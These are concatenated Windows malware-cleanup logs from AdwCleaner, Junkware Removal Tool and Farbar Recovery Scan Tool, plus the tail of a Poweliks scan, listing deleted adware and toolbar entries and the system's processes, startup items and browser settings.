[2014.11.10 19:31:16.202] - INFO: Processing [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]...
[2014.11.10 19:31:16.202] - INFO: Processing value [] = [%systemroot%\sysWOW64\wbem\wmiprvse.exe]
[2014.11.10 19:31:16.202] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2014.11.10 19:31:16.202] - INFO: Processing invalid values in [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]...
[2014.11.10 19:31:16.202] - INFO: Processing value [] = [%systemroot%\sysWOW64\wbem\wmiprvse.exe]
[2014.11.10 19:31:16.202] - INFO: Processing value [ServerExecutable] = [%systemroot%\sysWOW64\wbem\wmiprvse.exe]
[2014.11.10 19:31:16.202] - INFO: Processing value [] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2014.11.10 19:31:16.202] - INFO: Processing value [ServerExecutable] = [%systemroot%\system32\wbem\wmiprvse.exe]
[2014.11.10 19:31:16.202] - INFO: Processing invalid subkeys in [HKLM\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32]...
[2014.11.10 19:31:16.202] - INFO: Processing [HKLM\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}]...
[2014.11.10 19:31:16.202] - INFO: Processing subkey [\Registry\Machine\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32]
[2014.11.10 19:31:16.202] - INFO: Processing subkey [\Registry\Machine\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32]
[2014.11.10 19:31:16.202] - INFO: Win32/Poweliks not found
[2014.11.10 19:31:19.509] - End






# AdwCleaner v4.101 - Report created 10/11/2014 at 19:39:51
# Updated 09/11/2014 by Xplode
# Database : 2014-11-10.9 [Live]
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : My Computer - MYCOMPUTER-PC
# Running from : C:\Users\My Computer\Downloads\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****

Service Deleted : vToolbarUpdater18.1.7

***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\AVG Secure Search
Folder Deleted : C:\ProgramData\iolo
Folder Deleted : C:\Program Files (x86)\Common Files\AVG Secure Search
Folder Deleted : C:\Users\My Computer\AppData\Local\AVG SafeGuard toolbar
Folder Deleted : C:\Users\My Computer\AppData\LocalLow\AVG SafeGuard toolbar
Folder Deleted : C:\Users\My Computer\AppData\LocalLow\Toolbar4
Folder Deleted : C:\Users\My Computer\AppData\Roaming\ARecEngine
Folder Deleted : C:\Users\My Computer\AppData\Roaming\OpenCandy
Folder Deleted : C:\Users\My Computer\AppData\Roaming\pccustubinstaller
Folder Deleted : C:\Users\My Computer\AppData\Roaming\Systweak
File Deleted : C:\Users\My Computer\Desktop\Uninstall.exe

***** [ Scheduled Tasks ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Classes\AppID\TbCommonUtils.DLL
Key Deleted : HKLM\SOFTWARE\Classes\AppID\TbHelper.EXE
Key Deleted : HKLM\SOFTWARE\Classes\AppID\ViProtocol.DLL
Key Deleted : HKLM\SOFTWARE\Classes\protocols\handler\viprotocol
Key Deleted : HKLM\SOFTWARE\Classes\ScriptHelper.ScriptHelperApi
Key Deleted : HKLM\SOFTWARE\Classes\ScriptHelper.ScriptHelperApi.1
Key Deleted : HKLM\SOFTWARE\Classes\ViProtocol.ViProtocolOLE
Key Deleted : HKLM\SOFTWARE\Classes\ViProtocol.ViProtocolOLE.1
Key Deleted : HKLM\SOFTWARE\MozillaPlugins\@avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{1FDFF5A2-7BB1-48E1-8081-7236812B12B2}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{4CE516A7-F7AC-4628-B411-8F886DC5733E}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{628F3201-34D0-49C0-BB9A-82A26AEFB291}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{933B95E2-E7B7-4AD9-B952-7AC336682AE3}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{B658800C-F66E-4EF3-AB85-6C0C227862A9}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D824F0DE-3D60-4F57-9EB1-66033ECD8ABB}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F25AF245-4A81-40DC-92F9-E9021F207706}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{FFCB3198-32F3-4E8B-9539-4324694ED663}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{01221FCC-4BFB-461C-B08C-F6D2DF309921}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{0FA32667-9A8A-4E9C-902F-CA3323180003}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{2A42D13C-D427-4787-821B-CF6973855778}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{3D8478AA-7B88-48A9-8BCB-B85D594411EC}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{452AE416-9A97-44CA-93DA-D0F15C36254F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{45CDA4F7-594C-49A0-AAD1-8224517FE979}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4897BBA6-48D9-468C-8EFA-846275D7701B}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4D8ED2B3-DC62-43EC-ABA3-5B74F046B1BE}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{6B458F62-592F-4B25-8967-E6A350A59328}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{81E852CC-1FD5-4004-8761-79A48B975E29}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{95B6A271-FEB4-4160-B0FF-44394C21C8DC}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{B2CA345D-ADB8-4F5D-AC64-4AB34322F659}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{B9F43021-60D4-42A6-A065-9BA37F38AC47}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{BF921DD3-732A-4A11-933B-A5EA49F2FD2C}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{C401D2CE-DC27-45C7-BC0C-8E6EA7F085D6}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{D83B296A-2FA6-425B-8AE8-A1F33D99FBD6}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{E67D5BC7-7129-493E-9281-F47BDAFACE4F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{FCC9CDD3-EFFF-11D1-A9F0-00A0244AC403}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{4509D3CC-B642-4745-B030-645B79522C6D}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{74FB6AFD-DD77-4CEB-83BD-AB2B63E63C93}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{B87F8B63-7274-43FD-87FA-09D3B7496148}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{C2AC8A0E-E48E-484B-A71C-C7A937FAAB94}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{C4BAE205-5E02-4E32-876E-F34B4E2D000C}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{EC4085F2-8DB3-45A6-AD0B-CA289F3C5D7E}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FFCB3198-32F3-4E8B-9539-4324694ED663}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F25AF245-4A81-40DC-92F9-E9021F207706}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FFCB3198-32F3-4E8B-9539-4324694ED663}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{FFCB3198-32F3-4E8B-9539-4324694ED663}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{C6FDD0C3-266A-4DC3-B459-28C697C44CDC}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{F25AF245-4A81-40DC-92F9-E9021F207706}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{628F3201-34D0-49C0-BB9A-82A26AEFB291}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F25AF245-4A81-40DC-92F9-E9021F207706}
Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{95B7759C-8C7F-4BF1-B163-73684A933233}]
Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{FFCB3198-32F3-4E8B-9539-4324694ED663}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{01221FCC-4BFB-461C-B08C-F6D2DF309921}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{0FA32667-9A8A-4E9C-902F-CA3323180003}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{2A42D13C-D427-4787-821B-CF6973855778}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{3D8478AA-7B88-48A9-8BCB-B85D594411EC}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{452AE416-9A97-44CA-93DA-D0F15C36254F}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{45CDA4F7-594C-49A0-AAD1-8224517FE979}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4897BBA6-48D9-468C-8EFA-846275D7701B}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4D8ED2B3-DC62-43EC-ABA3-5B74F046B1BE}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{6B458F62-592F-4B25-8967-E6A350A59328}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{81E852CC-1FD5-4004-8761-79A48B975E29}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{95B6A271-FEB4-4160-B0FF-44394C21C8DC}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B2CA345D-ADB8-4F5D-AC64-4AB34322F659}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B9F43021-60D4-42A6-A065-9BA37F38AC47}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{BF921DD3-732A-4A11-933B-A5EA49F2FD2C}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{C401D2CE-DC27-45C7-BC0C-8E6EA7F085D6}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{D83B296A-2FA6-425B-8AE8-A1F33D99FBD6}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{E67D5BC7-7129-493E-9281-F47BDAFACE4F}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{FCC9CDD3-EFFF-11D1-A9F0-00A0244AC403}
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FFCB3198-32F3-4E8B-9539-4324694ED663}
Key Deleted : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{96BD48DD-741B-41AE-AC4A-AFF96BA00F7E}
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F25AF245-4A81-40DC-92F9-E9021F207706}
Key Deleted : HKCU\Software\AVG SafeGuard toolbar
Key Deleted : HKCU\Software\wecarereminder
Key Deleted : HKLM\SOFTWARE\AVG SafeGuard toolbar
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{021C6667-63D3-4416-B537-865E77F4DF4F}

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17344


-\\ Google Chrome v38.0.2125.111


-\\ Chromium v


*************************

AdwCleaner[R0].txt - [8693 octets] - [10/11/2014 19:37:06]
AdwCleaner[S0].txt - [8605 octets] - [10/11/2014 19:39:51]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [8665 octets] ##########

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.3.7 (11.08.2014:1)
OS: Windows 7 Home Premium x64
Ran by My Computer on Mon 11/10/2014 at 19:46:13.49
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services



~~~ Registry Values

Successfully repaired: [Registry Value] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL



~~~ Registry Keys



~~~ Files

Successfully deleted: [File] C:\windows\prefetch\TOOLBARUPDATER.EXE-5B19C2DF.pf
Successfully deleted: [File] "C:\windows\wininit.ini"



~~~ Folders



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Mon 11/10/2014 at 19:52:29.76
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~









Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 10-11-2014
Ran by My Computer (administrator) on MYCOMPUTER-PC on 10-11-2014 20:03:19
Running from C:\Users\My Computer\Desktop
Loaded Profile: My Computer (Available profiles: My Computer)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
() C:\Windows\System32\GFNEXSrv.exe
(Nitro PDF Software) C:\Program Files\Common Files\Nitro\Reader\3.0\NitroPDFReaderDriverService3x64.exe
(Symantec Corporation) C:\Program Files (x86)\PC Checkup\SymcPCCULaunchSvc.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\Power Saver\TPwrMain.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TBS\HSON.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\FlashCards\TCrdMain.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TECO\Teco.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\ReelTime\TosReelTimeMonitor.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\Power Saver\TosCoSrv.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(TOSHIBA Corporation) C:\Program Files\Toshiba\TECO\TecoService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TPHM\TPCHSrv.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TOSHIBA HDD SSD Alert\TosSENotify.exe
(TOSHIBA Corporation) C:\Program Files\Toshiba\TPHM\TPCHWMsg.exe
(Microsoft Corporation.) C:\Program Files (x86)\Microsoft\BingBar\7.3.124.0\SeaPort.EXE
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [] => [X]
HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [590256 2011-05-17] (TOSHIBA Corporation)
HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [296824 2010-09-25] (TOSHIBA Corporation)
HKLM\...\Run: [TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [972672 2011-04-27] (TOSHIBA Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12558440 2011-07-07] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2226280 2011-06-03] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2679592 2011-02-03] (Synaptics Incorporated)
HKLM\...\Run: [Teco] => C:\Program Files\TOSHIBA\TECO\Teco.exe [1544624 2011-05-24] (TOSHIBA Corporation)
HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe [710560 2011-06-10] (TOSHIBA Corporation)
HKLM\...\Run: [TosWaitSrv] => C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [712096 2011-07-01] (TOSHIBA Corporation)
HKLM\...\Run: [TosVolRegulator] => C:\Program Files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe [24376 2009-11-11] (TOSHIBA Corporation)
HKLM\...\Run: [TosReelTimeMonitor] => C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe [38824 2011-06-28] (TOSHIBA Corporation)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [343168 2011-10-13] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [ToshibaAppPlace] => C:\Program Files (x86)\Toshiba\Toshiba App Place\ToshibaAppPlace.exe [552960 2010-09-23] (Toshiba)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [4085896 2014-07-31] (AVAST Software)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [256896 2014-07-11] (Oracle Corporation)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-09-12] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-4159919823-1585328292-427241361-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [6462744 2014-08-21] (Piriform Ltd)
HKU\S-1-5-21-4159919823-1585328292-427241361-1000\...\Run: [Spybot-S&D Cleaning] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDCleaner.exe [4566952 2014-06-24] (Safer-Networking Ltd.)
HKU\S-1-5-21-4159919823-1585328292-427241361-1000\...\MountPoints2: {4edd8e39-d1f2-11e3-830a-386077ebbde8} - E:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-4159919823-1585328292-427241361-1000\...\MountPoints2: {d329bad1-4974-11e3-99b5-386077ebbde8} - E:\LaunchU3.exe
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll (AVAST Software)
BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://google.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.msn.com/?pc=AV01
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://start.toshiba.com/
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://start.toshiba.com/
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=AV01
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Bar = http://www.msn.com/?pc=AV01
SearchScopes: HKLM - DefaultScope {D01B96D2-26CC-48AD-9835-0116499E0CB9} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM - {D01B96D2-26CC-48AD-9835-0116499E0CB9} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKLM-x32 - DefaultScope {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
SearchScopes: HKLM-x32 - {D01B96D2-26CC-48AD-9835-0116499E0CB9} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKCU - DefaultScope {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
SearchScopes: HKCU - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKCU - {53439EBD-1E47-44D0-AC6E-AFBB1C5FFB6C} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=
SearchScopes: HKCU - {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
SearchScopes: HKCU - {D01B96D2-26CC-48AD-9835-0116499E0CB9} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\7.3.124.0\amd64\BingExt.dll (Microsoft Corporation.)
BHO: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\x64\TOSHIBAMediaControllerIE.dll (TOSHIBA Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\7.3.124.0\BingExt.dll (Microsoft Corporation.)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll (TOSHIBA Corporation)
Toolbar: HKLM - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\7.3.124.0\amd64\BingExt.dll (Microsoft Corporation.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\7.3.124.0\BingExt.dll (Microsoft Corporation.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKLM-x32 - No Name - {8660E5B3-6C41-44DE-8503-98D99BBECD41} - No File
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw_1213153.dll (Adobe Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.65.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.65.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
